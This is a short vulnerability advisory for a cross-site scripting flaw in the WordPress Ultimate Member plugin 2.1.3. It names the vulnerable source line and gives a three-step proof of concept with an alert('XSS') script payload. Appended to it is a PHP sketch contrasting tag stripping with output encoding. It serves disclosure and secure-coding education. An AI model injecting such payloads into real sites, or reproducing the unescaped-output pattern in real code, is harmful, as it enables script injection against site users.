WordPress Ultimate-Member plugin version 2.1.3 suffers from a cross site scripting vulnerability.
3cbf268b58052c6f4f6bdd7d408ea24c
[-] Title : WordPress plugin Ultimate-Member 2.1.3 - Cross Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/ultimate-member/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
ultimate-member/includes/admin/core/class-admin-settings.php
==============================================================================================
Vulnerable Source:
2876: echo wp_strip_all_tags($_POST['um-install-info']);
===============================================================================================
POC :
Step 1 = Go to the web page:
http://localhost/wp-content/plugins/ultimate-member/includes/admin/core/class-admin-settings.php
Step 2 = In the box: "um-install-info"
Step 3 = In the input box, add JavaScript code: <script>alert('XSS')</script>
===============================================================================================
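Added example (not from the advisory and not the plugin's code): the source line above writes a request value to the response after tag stripping only, and this PHP sketch contrasts that pattern with encoding the value for the HTML context on output. The function names and sample requests are constructed for illustration, and plain-PHP strip_tags() stands in for wp_strip_all_tags(), which additionally drops the contents of script and style elements.

```php
<?php
declare(strict_types=1);

// Added example, not Ultimate Member code. Function names and the sample
// requests below are constructed for illustration.

/** Fetch the field as a string; arrays (um-install-info[]=x) become ''. */
function install_info_field(array $post): string
{
    $raw = $post['um-install-info'] ?? '';
    return is_string($raw) ? $raw : '';
}

/** Pattern from the advisory: tags are stripped, nothing is encoded. */
function render_stripped(array $post): string
{
    // strip_tags() is a plain-PHP stand-in for wp_strip_all_tags().
    return strip_tags(install_info_field($post));
}

/** Hardened form: encode for the HTML text/attribute context on output. */
function render_encoded(array $post): string
{
    return htmlspecialchars(
        install_info_field($post),
        ENT_QUOTES | ENT_SUBSTITUTE, // encode both quote styles, replace bad UTF-8
        'UTF-8'
    );
}

// Constructed sample requests.
$samples = [
    'PoC value from the advisory' => ['um-install-info' => "<script>alert('XSS')</script>"],
    'benign text with markup characters' => ['um-install-info' => 'PHP 7.4 & MySQL "5.7" <stable>'],
    'array instead of string' => ['um-install-info' => ['unexpected']],
    'field missing' => [],
];

foreach ($samples as $label => $post) {
    printf("%s\n  stripped: %s\n  encoded:  %s\n", $label, render_stripped($post), render_encoded($post));
}
```

Inside WordPress the equivalent output helpers are esc_html() and esc_textarea(); stripping changes the submitted text, while encoding preserves it and leaves `<`, `>`, `&` and both quote characters inert.
===============================================================================================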
************************
* ==> Contact us :
* Telegram : @MF0584
* Email : [email protected]
************************